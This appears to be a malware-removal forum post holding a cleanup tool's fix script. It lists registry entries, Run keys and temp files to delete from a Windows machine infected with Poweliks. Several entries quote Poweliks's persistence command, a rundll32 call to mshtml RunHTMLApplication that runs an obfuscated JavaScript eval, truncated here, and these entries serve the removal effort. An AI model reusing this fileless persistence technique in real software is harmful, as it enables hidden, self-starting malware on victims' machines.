0 Members and 1 Guest are viewing this topic.
CreateRestorePoint: HKU\S-1-5-21-3363881461-870442667-2210038420-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!HKU\S-1-5-18\...\Run: [fcdctr] => C:\Windows\system32\MigAnet1.exeHKU\S-1-5-18\...\Run: [fcutil] => C:\Windows\system32\MigAnet.exeHKU\S-1-5-18\...\Run: [fcperf] => C:\Windows\system32\MigAdmin.exeHKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTIONHKU\S-1-5-21-3363881461-870442667-2210038420-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTIONS3 catchme; \??\C:\ComboFix\catchme.sys [X]2015-02-05 16:01 - 2013-02-25 23:32 - 03299512 _____ (NVIDIA Corporation) C:\Windows\system32\SETFFD6.tmp2015-02-05 16:01 - 2013-02-25 23:32 - 03299512 _____ (NVIDIA Corporation) C:\Windows\system32\SETCF45.tmp2015-02-05 16:01 - 2013-02-25 23:32 - 03299512 _____ (NVIDIA Corporation) C:\Windows\system32\SET8FE5.tmp2015-02-05 16:01 - 2013-02-25 23:32 - 03299512 _____ (NVIDIA Corporation) C:\Windows\system32\SET6260.tmp2015-02-05 16:01 - 2013-02-25 23:32 - 03299512 _____ (NVIDIA Corporation) C:\Windows\system32\SET5517.tmpCustomCLSID: HKU\S-1-5-21-3363881461-870442667-2210038420-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?C:\Windows\system32\MigAnet1.exeC:\Windows\system32\MigAnet.exeC:\Windows\system32\MigAdmin.exeEmptyTemp: CMD: bitsadmin /reset /allusers